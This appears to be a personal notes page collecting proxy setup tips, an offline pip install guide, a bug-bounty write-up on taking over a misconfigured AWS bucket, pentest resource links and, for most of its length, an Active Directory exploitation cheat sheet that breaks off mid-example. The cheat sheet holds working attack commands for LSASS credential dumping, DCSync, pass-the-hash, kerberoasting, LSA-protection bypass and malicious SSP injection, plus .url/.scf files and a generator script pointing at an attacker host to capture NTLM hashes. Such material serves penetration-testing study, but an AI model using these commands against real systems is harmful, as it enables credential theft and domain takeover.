Fiddler Setup

Paths & Info · 2023. 11. 10. 10:55

 

Fiddler on an internal network

 

Options > HTTPS > Decrypt

Connections > verify port 8888 > open 127.0.0.1:8888 in a browser > install the certificate

Gateway > Manual Proxy Config > 127.0.0.1:8080 (Burp's port number)

 

Check Capturing (F12), then watch the packets come in through Burp.


https://seonu-lim.github.io/python/%EC%98%A4%ED%94%84%EB%9D%BC%EC%9D%B8%EC%97%90%EC%84%9C-%ED%8C%8C%EC%9D%B4%EC%8D%AC%ED%8C%A8%ED%82%A4%EC%A7%80-%EC%84%A4%EC%B9%98%ED%95%98%EA%B8%B0/

 

Installing packages while offline?


 

My new workplace uses something called VDI (Virtual Desktop Infrastructure) for security reasons, and since it's my first encounter with it, I'm not used to it yet. In principle, all company data exists only inside the VDI, and taking data out requires approval. Even the company messenger and email can only be checked inside the VDI... and on top of that, the internet is unreachable except for the company homepage!

In such a closed environment, using Python as a development or analysis tool comes with difficulties too. Installing packages usually means pip or conda, but without an internet connection, downloading packages becomes a real chore. To make matters worse, I'm currently in charge of Python training at the company, so I have to make it possible for complete beginners to install packages inside the VDI. So I'll describe the simplest method I can.

The local machine used to access the VDI does have internet access except for a few sites, so first install the desired package locally. However, on our company network, a plain pip install foo fails with some SSL-certificate error, so add the following arguments:

pip --trusted-host pypi.org --trusted-host files.pythonhosted.org install foo
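If the corporate proxy always breaks certificate validation, the trusted hosts can be made permanent in pip's config file instead of repeating the flags each time (a sketch; the file lives at %APPDATA%\pip\pip.ini on Windows or ~/.config/pip/pip.conf on Linux/macOS):

```ini
[global]
trusted-host = pypi.org
               files.pythonhosted.org
```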

Once that installs, create a folder, open a shell, and move into it. Then download the package like this:

pip --trusted-host pypi.org --trusted-host files.pythonhosted.org download foo

The folder will now contain the foo archive along with its dependencies. Move these to the VDI through the file-transfer system. Assume the VDI has only Python installed. Now save the transferred files to a specific path and open a shell there.

python -m pip install --no-index -f . foo

If you get an error, check whether the Python version that downloaded the .whl files differs from the Python version you're installing them with.
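A quick way to compare is to print the interpreter's wheel-tag components on both machines and check them against the downloaded filenames (a minimal sketch; a wheel name like foo-1.0-cp39-cp39-win_amd64.whl is a made-up example):

```python
import sys
import sysconfig

# e.g. "cp39": must match the cpXY part of the wheel filename
py_tag = f"cp{sys.version_info.major}{sys.version_info.minor}"

# e.g. "win-amd64" or "linux-x86_64": must match the platform part
platform = sysconfig.get_platform()

print(py_tag, platform)
```

If either component differs between the local machine and the VDI, re-download the wheels with the matching Python.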


https://medium.com/@pratyush1337/information-disclosure-via-misconfigured-aws-to-aws-bucket-takeover-6a6a66470d0e

 


 

Information Disclosure via Misconfigured AWS to AWS Bucket Takeover

Hey! Welcome to a new write-up on my recent finding of a misconfigured AWS bucket and how I was able to take full control of it.

I was checking out the website mainly for IDOR vulnerabilities, as those are considered high-priority bugs and are paid in a high range. I tried to check every possible endpoint for a parameter whose numerical value I could manipulate, so I fired up Burp Suite and sent the requests to the spider tab to enumerate all the endpoints, but I failed because they had encrypted every numerical value using a salted algorithm.

Since no IDOR was possible, I looked further and found an interesting endpoint where I could set my organization's logo, and there was a direct link to the logo, which resided in an AWS bucket. You can check below:

So I checked the logo by copying the link directly and opening it in a new tab:

I never thought I would find anything like this, so I had never tried it in any of the public or private programs I had worked on. But that day I thought, let's go to the parent directory of the file (in hacker's language, ../ ;)). So I checked it by browsing to the parent directory, as you can see:

Bingo! This was a proper information disclosure due to a misconfigured ACL on the AWS bucket. I was happy and thought of reporting it right away, but as a hacker you are always curious to find all the juicy information that might be exploitable. So without wasting any time, I went ahead to check all the files listed in the directory, but first I tried to access one of the files to check whether they were real.

Then I opened the file to see the content:

Now I was confident that all the files available there were legitimate, and we could see all the internal files of the xyz company, with small tutorials and screenshots. This was an internal S3 bucket used for training and demonstration purposes, such as sharing screenshots of their products... so now you can see why it's critical.

At that moment I felt it was enough to report, but I took a chance and wondered whether the bucket offered something else to compromise itself. Is it possible? Let's see what happens... I started checking files by extension, especially .zip, .htm, .eml, .doc and .csv, and while searching through the entire bucket (which consisted of 700+ files) I found the first zip file:

So I downloaded it and checked the contents:

After checking the files in that zip, I figured out it wasn't going to offer me anything to compromise the AWS bucket. So I kept searching for other zip files and found an interesting one in the bucket:

I downloaded the file and opened it to check the contents:

I checked all the files, but the important one was "document.wflow": it had everything I needed to take over the AWS bucket. Let's check the content:

I was so happy to see these credentials, but the funny thing was that I didn't know what to do with them, having zero knowledge of AWS. So I asked one of my office colleagues, a dev who works on AWS. He told me to go download S3 Browser and start browsing the AWS bucket with the "access_key" and "secret_key", which was a very new learning experience in my web-application penetration testing. I was like:

 

So I downloaded it and entered all the required credentials:

Boom!

Next I checked the Access Control List permissions on each directory and found a directory with full access:

With full access to this directory I was effectively its owner: I could upload any file I wanted, delete files, or delete the whole directory. I had all the access in the world, but as you know, we stay ethical in what we do, so as a proof of concept I uploaded a file:

To re-verify, I checked the public-facing bucket for my uploaded file name.

 

As a final check, I pasted the filename into the URL:

Damn! AWS Bucket Takeover!

Following my initial report and its review, they promptly and fairly compensated me for letting them know about this bug. I am really thankful for that :)


https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

 

Hacking Swagger-UI - from XSS to account takeovers

We have reported more than 60 instances of this bug across a wide range of bug bounty programs including companies like Paypal, Atlassian, Microsoft, GitLab, Yahoo, ...


 

 


https://adsecurity.org/

 


 

https://www.harmj0y.net/blog/

 

 


https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/

 

Penetration Testing Active Directory, Part I


 

https://theredteamlabs.com/active-directory-penetration-testing/

 

Active Directory Penetration Testing and Lab Setup - RedTeam


 

 


https://bhavsec.com/posts/active-directory-resources/

 

This post contains Active Directory pentesting resources to prepare for the new OSCP (2022) exam.

Youtube/Twitch Videos

Active Directory madness and the Esoteric Cult of Domain Admin! - alh4zr3d

TryHackMe - Advent of Cyber + Active Directory - tib3rius

Common Active Directory Attacks: Back to the Basics of Security Practices - TrustedSec

How to build an Active Directory Lab - The Cyber Mentor

Zero to Hero (Episode 8,9,10) - The Cyber Mentor

Blogs

Top Five Ways I Got Domain Admin on Your Internal Network before Lunch

https://medium.com/@Dmitriy_Area51/active-directory-penetration-testing-d9180bff24a1

https://book.hacktricks.xyz/windows/active-directory-methodology

https://zer1t0.gitlab.io/posts/attacking_ad/

Cheatsheets

https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

https://infosecwriteups.com/active-directory-penetration-testing-cheatsheet-5f45aa5b44ff

TryHackMe VIP/Free Labs

Active Directory Basics - Easy

Post-Exploitation Basics - Easy

Vulnnet Roasted - Easy

Attacktive Directory - Medium

raz0r black - Medium

Enterprise - Medium

Vulnnet Active - Medium

Zero Logon - Hard

TryHackMe Paid Labs ($10 - $60 / month)

Holo - Hard

Throwback - Easy

HackTheBox Subscription/Free Labs

Forest - Easy

Active - Easy

Fuse - Medium

Cascade - Medium

Monteverde - Medium

Resolute - Medium

Arkham - Medium

Mantis - Hard

APT - Insane

HackTheBox Pro Labs ($95 + $27/month)

Dante - Beginner

Offshore - Intermediate

RastaLabs - Intermediate

Cybernetics - Advanced

APT Labs - Advanced

HackTheBox Academy (Paid)

ActiveDirectory LDAP - Medium

ActiveDirectory Powerview - Medium

ActiveDirectory BloodHound - Medium

CyberSecLabs Walkthrough

Secret

Zero

Brute

Dictionary

Roast

Spray

Sync

Toast

Certifications

OSCP - Offensive Security Certified Professional - Offsec - Intermediate

CRTP - Certified Red Team Professional - Pentester Academy - Beginner

CRTE - Certified Red Team Expert - Pentester Academy - Expert

CRTO - Certified Red Team Operator - Zeropoint Security - Intermediate

Courses

Practical Ethical Hacking - TCM Security

Active Directory Pentesting Full Course - Red Team Hacking

Red Team Ethical Hacking - Beginner

Red Team Ethical Hacking - Intermediate

Tools and Repositories

Nishang

Mimikatz

Kekeo

Rubeus

Powersploit

Powercat

PowerUpSQL

HeidiSQL

Proving Grounds Playground - Offensive Security

Hutch, Heist & Vault


Active Directory Exploitation Cheat Sheet

https://github.com/geeksniper/active-directory-pentest

 


This cheat sheet contains common enumeration and attack methods for Windows Active Directory.

This cheat sheet is inspired by the PayloadAllTheThings repo.

Summary

Tools

Domain Enumeration

Using PowerView

Powerview v.3.0
Powerview Wiki

  • Get Current Domain: Get-Domain
  • Enumerate Other Domains: Get-Domain -Domain <DomainName>
  • Get Domain SID: Get-DomainSID
  • Get Domain Policy:
  • #Will show us the policy configurations of the Domain about system access or kerberos
    Get-DomainPolicy
    Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess
    Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicy
     
  • Get Domain Controllers:
  • Get-DomainController
    Get-DomainController -Domain <DomainName>
     
  • Enumerate Domain Users:
  • #Save all Domain Users to a file
    Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
    
    #Will return specific properties of a specific user
    Get-DomainUser -Identity [username] -Properties DisplayName, MemberOf | Format-List
    
    #Enumerate user logged on a machine
    Get-NetLoggedon -ComputerName <ComputerName>
    
    #Enumerate Session Information for a machine
    Get-NetSession -ComputerName <ComputerName>
    
    #Enumerate domain machines of the current/specified domain where specific users are logged into
    Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromName
     
  • Enum Domain Computers:
  • Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
    
    #Enumerate Live machines
    Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
     
  • Enum Groups and Group Members:
  • #Save all Domain Groups to a file:
    Get-DomainGroup | Out-File -FilePath .\DomainGroup.txt
    
    #Return members of Specific Group (eg. Domain Admins & Enterprise Admins)
    Get-DomainGroup -Identity '<GroupName>' | Select-Object -ExpandProperty Member
    Get-DomainGroupMember -Identity '<GroupName>' | Select-Object MemberDistinguishedName
    
    #Enumerate the local groups on the local (or remote) machine. Requires local admin rights on the remote machine
    Get-NetLocalGroup | Select-Object GroupName
    
    #Enumerates members of a specific local group on the local (or remote) machine. Also requires local admin rights on the remote machine
    Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
    
    #Return all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
    Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
     
  • Enumerate Shares:
  • #Enumerate Domain Shares
    Find-DomainShare
    
    #Enumerate Domain Shares the current user has access
    Find-DomainShare -CheckShareAccess
    
    #Enumerate "Interesting" Files on accessible shares
    Find-InterestingDomainShareFile -Include *passwords*
     
  • Enum Group Policies:
  • Get-DomainGPO -Properties DisplayName | Sort-Object -Property DisplayName
    
    #Enumerate all GPOs to a specific computer
    Get-DomainGPO -ComputerIdentity <ComputerName> -Properties DisplayName | Sort-Object -Property DisplayName
    
    #Get users that are part of a Machine's local Admin group
    Get-DomainGPOComputerLocalGroupMapping -ComputerName <ComputerName>
     
  • Enum OUs:
  • Get-DomainOU -Properties Name | Sort-Object -Property Name
     
  • Enum ACLs:
  • # Returns the ACLs associated with the specified account
    Get-DomainObjectAcl -Identity <AccountName> -ResolveGUIDs
    
    #Search for interesting ACEs
    Find-InterestingDomainAcl -ResolveGUIDs
    
    #Check the ACLs associated with a specified path (e.g smb share)
    Get-PathAcl -Path "\\Path\Of\A\Share"
     
  • Enum Domain Trust:
  • Get-DomainTrust
    Get-DomainTrust -Domain <DomainName>
    
    #Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds
    Get-DomainTrustMapping
     
  • Enum Forest Trust:
  • Get-ForestDomain
    Get-ForestDomain -Forest <ForestName>
    
    #Map the Trust of the Forest
    Get-ForestTrust
    Get-ForestTrust -Forest <ForestName>
     
  • User Hunting: Priv Esc to Domain Admin with User Hunting:
    I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> Profit!
  • #Finds all machines on the current domain where the current user has local admin access
    Find-LocalAdminAccess -Verbose
    
    #Find local admins on all machines of the domain
    Find-DomainLocalGroupMember -Verbose
    
    #Find computers where a Domain Admin OR a specified user has a session
    Find-DomainUserLocation | Select-Object UserName, SessionFromName
    
    #Confirming admin access
    Test-AdminAccess
     

Using AD Module

  • Get Current Domain: Get-ADDomain
  • Enum Other Domains: Get-ADDomain -Identity <Domain>
  • Get Domain SID: Get-DomainSID
  • Get Domain Controllers:
  • Get-ADDomainController
    Get-ADDomainController -Identity <DomainName>
     
  • Enumerate Domain Users:
  • Get-ADUser -Filter * -Properties *
    
    #Get a specific user
    Get-ADUser -Identity <user> -Properties *
    
    #Search for a specific "string" in a user's attribute
    Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
     
  • Enum Domain Computers:
  • Get-ADComputer -Filter * -Properties *
    Get-ADGroup -Filter *
     
  • Enum Domain Trust:
  • Get-ADTrust -Filter *
    Get-ADTrust -Identity <DomainName>
     
  • Enum Forest Trust:
  • Get-ADForest
    Get-ADForest -Identity <ForestName>
    
    #Domains of Forest Enumeration
    (Get-ADForest).Domains
     
  • Enum Local AppLocker Effective Policy:
  • Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
     

Using BloodHound

Remote BloodHound

Python BloodHound Repository or install it with pip3 install bloodhound

bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All
 

On Site BloodHound

#Using exe ingestor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>

#Using PowerShell module ingestor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -LdapUsername <UserName> -LdapPassword <Password> -OutputDirectory <PathToFile>
 

Using Adalanche

Remote Adalanche

# kali linux:
./adalanche collect activedirectory --domain <Domain> \
--username <Username@Domain> --password <Password> \
--server <DC>

# Example:
./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb
## -> Terminating successfully

## Any error?:

# LDAP Result Code 200 "Network Error": x509: certificate signed by unknown authority ?

./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb --tlsmode NoTLS --port 389

# Invalid Credentials ?
./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb --tlsmode NoTLS --port 389 \
--authmode basic

# Analyze data 
# go to web browser -> 127.0.0.1:8080
./adalanche analyze
 

Useful Enumeration Tools

  • ldapdomaindump Information dumper via LDAP
  • adidnsdump Integrated DNS dumping by any authenticated user
  • ACLight Advanced Discovery of Privileged Accounts
  • ADRecon Detailed Active Directory Recon Tool

Local Privilege Escalation

Useful Local Priv Esc Tools

  • PowerUp Misconfiguration Abuse
  • BeRoot General Priv Esc Enumeration Tool
  • Privesc General Priv Esc Enumeration Tool
  • FullPowers Restore A Service Account's Privileges

Lateral Movement

PowerShell Remoting

#Enable PowerShell Remoting on current Machine (Needs Admin Access)
Enable-PSRemoting

#Entering or Starting a new PSSession (Needs Admin Access)
$sess = New-PSSession -ComputerName <Name>
Enter-PSSession -ComputerName <Name>   #or: Enter-PSSession -Session <SessionName>
 

Remote Code Execution with PS Credentials

$SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword)
Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami}
 

Import a PowerShell Module and Execute its Functions Remotely

#Execute the command and start a session
Invoke-Command -Credential $cred -ComputerName <NameOfComputer> -FilePath c:\FilePath\file.ps1 -Session $sess

#Interact with the session
Enter-PSSession -Session $sess
 

Executing Remote Stateful commands

#Create a new session
$sess = New-PSSession -ComputerName <NameOfComputer>

#Execute command on the session
Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}

#Check the result of the command to confirm we have an interactive session
Invoke-Command -Session $sess -ScriptBlock {$ps}
 

Mimikatz

#The commands are in cobalt strike format!

#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords

#(Over) Pass The Hash
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>

#List all available kerberos tickets in memory
mimikatz sekurlsa::tickets

#Dump local Terminal Services credentials
mimikatz sekurlsa::tspkg

#Dump and save LSASS in a file
mimikatz sekurlsa::minidump c:\temp\lsass.dmp

#List cached MasterKeys
mimikatz sekurlsa::dpapi

#List local Kerberos AES Keys
mimikatz sekurlsa::ekeys

#Dump SAM Database
mimikatz lsadump::sam

#Dump SECRETS Database
mimikatz lsadump::secrets

#Inject and dump the Domain Controler's Credentials
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject

#Dump the Domain's Credentials without touching DC's LSASS and also remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all

#List and Dump local kerberos credentials
mimikatz kerberos::list /dump

#Pass The Ticket
mimikatz kerberos::ptt <PathToKirbiFile>

#List TS/RDP sessions
mimikatz ts::sessions

#List Vault credentials
mimikatz vault::list
 

❗ What if mimikatz fails to dump credentials because of LSA Protection controls ?

  • LSA as a Protected Process (Kernel Land Bypass)
  • #Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
    reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
    
    #Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
    #Now lets import the mimidriver.sys to the system
    mimikatz # !+
    
    #Now lets remove the protection flags from lsass.exe process
    mimikatz # !processprotect /process:lsass.exe /remove
    
    #Finally run the logonpasswords function to dump lsass
    mimikatz # sekurlsa::logonpasswords
     
  • LSA as a Protected Process (Userland "Fileless" Bypass)
  • LSA is running as virtualized process (LSAISO) by Credential Guard
  • #Check if a process called lsaiso.exe exists on the running processes
    tasklist |findstr lsaiso
    
    #If it does, there isn't a way to dump lsass; we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
    #Let's inject our own malicious Security Support Provider into memory; for this example I'll use the one mimikatz provides
    mimikatz # misc::memssp
    
    #Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
     
  • Detailed Mimikatz Guide
  • Poking Around With 2 lsass Protection Options

Remote Desktop Protocol

If the host we want to lateral move to has "RestrictedAdmin" enabled, we can pass the hash using the RDP protocol and get an interactive session without the plaintext password.

  • Mimikatz:
  • #We execute pass-the-hash using mimikatz and spawn an instance of mstsc.exe with the "/restrictedadmin" flag
    privilege::debug
    sekurlsa::pth /user:<Username> /domain:<DomainName> /ntlm:<NTLMHash> /run:"mstsc.exe /restrictedadmin"
    
    #Then just click ok on the RDP dialogue and enjoy an interactive session as the user we impersonated
     
  • xFreeRDP:
xfreerdp  +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /bpp:8  /u:<Username> /pth:<NTLMHash> /v:<Hostname | IPAddress>
 

❗ If Restricted Admin mode is disabled on the remote machine, we can connect to the host using another tool/protocol like psexec or winrm and enable it by creating the following registry value and setting it to zero: "HKLM:\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin".
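That registry change can be made in one command on the remote host (a sketch; requires admin rights there):

```
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
```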

URL File Attacks

  • .url file (variant 1):
  • [InternetShortcut]
    URL=file://<AttackersIp>/leak/leak.html
     
  • .url file (variant 2):
  • [InternetShortcut]
    URL=whatever
    WorkingDirectory=whatever
    IconFile=\\<AttackersIp>\%USERNAME%.icon
    IconIndex=1
     
  • .scf file:
  • [Shell]
    Command=2
    IconFile=\\<AttackersIp>\Share\test.ico
    [Taskbar]
    Command=ToggleDesktop
     

Place these files in a writable share; the victim only has to open the file explorer and navigate to the share. Note that the file doesn't need to be opened and the user doesn't need to interact with it, but it must be at the top of the file system, or just visible in the Windows Explorer window, in order to be rendered. Use Responder to capture the hashes.

❗ .scf file attacks won't work on the latest versions of Windows.
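The payload files above can be generated with a short script, similar to what ntlm_theft automates (a minimal sketch; the IP 10.10.10.10 and the @readme filenames are placeholders):

```python
from pathlib import Path

ATTACKER_IP = "10.10.10.10"  # placeholder: your Responder listener

# .url variant: icon fetched from the attacker's UNC path
url_payload = "\n".join([
    "[InternetShortcut]",
    "URL=whatever",
    "WorkingDirectory=whatever",
    rf"IconFile=\\{ATTACKER_IP}\%USERNAME%.icon",
    "IconIndex=1",
])

# .scf variant (only renders on older Windows versions)
scf_payload = "\n".join([
    "[Shell]",
    "Command=2",
    rf"IconFile=\\{ATTACKER_IP}\Share\test.ico",
    "[Taskbar]",
    "Command=ToggleDesktop",
])

# the leading "@" sorts the files to the top of the share listing
Path("@readme.url").write_text(url_payload)
Path("@readme.scf").write_text(scf_payload)
```

Drop the generated files in the writable share and wait for hashes on the Responder side.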

Useful Tools

  • Powercat netcat written in powershell, and provides tunneling, relay and portforward capabilities.
  • SCShell fileless lateral movement tool that relies on ChangeServiceConfigA to run command
  • Evil-Winrm the ultimate WinRM shell for hacking/pentesting
  • RunasCs Csharp and open version of windows builtin runas.exe
  • ntlm_theft creates all possible file formats for url file attacks

Domain Privilege Escalation

Kerberoast

WUT IS DIS?:
All standard domain users can request a copy of all service accounts along with their correlating password hashes, so we can ask for a TGS for any SPN that is bound to a "user"
account, extract the encrypted blob that was encrypted using the user's password, and bruteforce it offline.

  • PowerView:
  • #Get User Accounts that are used as Service Accounts
    Get-NetUser -SPN
    
    #Get every available SPN account, request a TGS and dump its hash
    Invoke-Kerberoast
    
    #Requesting the TGS for a single account:
    Request-SPNTicket
    
    #Export all tickets using Mimikatz
    Invoke-Mimikatz -Command '"kerberos::list /export"'
     
  • AD Module:
  • #Get User Accounts that are used as Service Accounts
    Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
     
  • Impacket:
  • python GetUserSPNs.py <DomainName>/<DomainUser>:<Password> -outputfile <FileName>
     
  • Rubeus:
  • #Kerberoasting and outputting to a file with a specific format
    Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName>
    
    #Kerberoasting while being "OPSEC" safe, essentially by not trying to roast AES-enabled accounts
    Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /rc4opsec
    
    #Kerberoast AES enabled accounts
    Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /aes
    
    #Kerberoast a specific user account
    Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /user:<username> /simple
    
    #Kerberoast by specifying the authentication credentials
    Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /creduser:<username> /credpassword:<password>
     

ASREPRoast

WUT IS DIS?:
If a domain user account does not require Kerberos preauthentication, we can request a valid TGT for this account without even having domain credentials, extract the encrypted
blob and bruteforce it offline.

  • PowerView: Get-DomainUser -PreauthNotRequired -Verbose
  • AD Module: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Forcefully disable Kerberos preauth on an account we have Write permissions (or more) on. Check for interesting permissions on accounts:

Hint: We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because Machine Account hashes are not crackable!

PowerView:

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

#Disable Kerberos Preauth:
Set-DomainObject -Identity <UserAccount> -XOR @{useraccountcontrol=4194304} -Verbose

#Check if the value changed:
Get-DomainUser -PreauthNotRequired -Verbose
 
  • And finally execute the attack using the ASREPRoast tool.
  • #Get a specific account's hash:
    Get-ASREPHash -UserName <UserName> -Verbose
    
    #Get any ASREPRoastable Users hashes:
    Invoke-ASREPRoast -Verbose
     
  • Using Rubeus:
  • #Trying the attack for all domain users
    Rubeus.exe asreproast /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
    
    #ASREPRoast a specific user
    Rubeus.exe asreproast /user:<username> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
    
    #ASREPRoast users of a specific OU (Organizational Unit)
    Rubeus.exe asreproast /ou:<OUName> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
     
  • Using Impacket:
  • #Trying the attack for the specified users on the file
    python GetNPUsers.py <domain_name>/ -usersfile <users_file> -outputfile <FileName>
     

Password Spray Attack

If we have harvested some passwords by compromising a user account, we can use this method to try to exploit password reuse on other domain accounts.

Tools:

Force Set SPN

WUT IS DIS?: If we have enough permissions (GenericAll/GenericWrite), we can set an SPN on a target account, request a TGS for it, then grab its blob and bruteforce it.

  • PowerView:
  • #Check for interesting permissions on accounts:
    Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
    
    #Check if the current user already has an SPN set:
    Get-DomainUser -Identity <UserName> | select serviceprincipalname
    
    #Force set the SPN on the account:
    Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
     
  • AD Module:
  • #Check if the current user already has an SPN set
    Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName
    
    #Force set the SPN on the account:
    Set-ADUser -Identity <UserName> -ServicePrincipalNames @{Add='ops/whatever1'}
     

Finally use any tool from before to grab the hash and kerberoast it!

Abusing Shadow Copies

If you have local administrator access on a machine, try to list shadow copies; it's an easy path to domain escalation.

#List shadow copies using vssadmin (needs Administrator access)
vssadmin list shadows

#List shadow copies using diskshadow
diskshadow list shadows all

#Make a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
 
  1. You can dump the backed-up SAM database and harvest credentials.
  2. Look for DPAPI-stored creds and decrypt them.
  3. Access backed-up sensitive files.

List and Decrypt Stored Credentials using Mimikatz

Usually encrypted credentials are stored in:

  • %appdata%\Microsoft\Credentials
  • %localappdata%\Microsoft\Credentials
#By using the cred function of mimikatz we can enumerate the cred object and get information about it:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"

#From the previous command we are interested in the "guidMasterKey" parameter, which tells us which masterkey was used to encrypt the credential
#Lets enumerate the Master Key:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>"

#Now if we are in the context of the user (or system) that the credential belongs to, we can use the /rpc flag to pass the decryption of the masterkey to the domain controller:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>" /rpc

#We now have the masterkey in our local cache:
dpapi::cache

#Finally we can decrypt the credential using the cached masterkey:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
 

Detailed Article: DPAPI all the things

Unconstrained Delegation

WUT IS DIS ?: If we have Administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a high value target or DA to connect to it, steal his TGT then ptt and impersonate him!

Using PowerView:

#Discover domain joined computers that have Unconstrained Delegation enabled
Get-NetComputer -UnConstrained

#List tickets and check if a DA or some High Value target has stored its TGT
Invoke-Mimikatz -Command '"sekurlsa::tickets"'

#Command to monitor any incoming sessions on our compromised server
Invoke-UserHunter -ComputerName <NameOfTheComputer> -Poll <TimeOfMonitoringInSeconds> -UserName <UserToMonitorFor> -Delay <WaitInterval> -Verbose

#Dump the tickets to disk:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

#Impersonate the user using ptt attack:
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTicket>"'
 

Note: We can also use Rubeus!

Constrained Delegation

Using PowerView and Kekeo:

#Enumerate Users and Computers with constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

#If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo
tgt::ask /user:<UserName> /domain:<Domain's FQDN> /rc4:<hashedPasswordOfTheUser>

#Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation
tgs::s4u /tgt:<PathToTGT> /user:<UserToImpersonate>@<Domain's FQDN> /service:<Service's SPN>

#Finally use mimikatz to ptt the TGS
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTGS>"'
 

ALTERNATIVE: Using Rubeus:

Rubeus.exe s4u /user:<UserName> /rc4:<NTLMhashedPasswordOfTheUser> /impersonateuser:<UserToImpersonate> /msdsspn:"<Service's SPN>" /altservice:<Optional> /ptt
 

Now we can access the service as the impersonated user!

🚩 What if we have delegation rights for only a specific SPN? (e.g. TIME):

In this case we can still abuse a feature of Kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services, not only the one we have rights for. That gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine.
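The trick works because the service class in the ticket's SPN is not protected by the ticket's signature, so it can be rewritten while the host part stays the same. A tiny sketch of that substitution (hypothetical SPNs, mirroring what Rubeus' /altservice flag produces):

```python
def swap_service_class(spn: str, alt_service: str) -> str:
    # The service class of an SPN is not protected by the TGS signature,
    # so it can be swapped while the host part stays the same.
    service, _, host = spn.partition("/")
    return f"{alt_service}/{host}"

# e.g. delegation granted only for TIME, but we request CIFS instead:
print(swap_service_class("time/dc01.corp.local", "cifs"))
```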

Resource Based Constrained Delegation

WUT IS DIS?:
TL;DR
If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate Domain Administrator and have complete access.

Tools we are going to use:

First we need to enter the security context of the user/machine account that has the privileges over the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.

Exploitation Example:

#Import Powermad and use it to create a new MACHINE ACCOUNT
. .\Powermad.ps1
New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose

#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
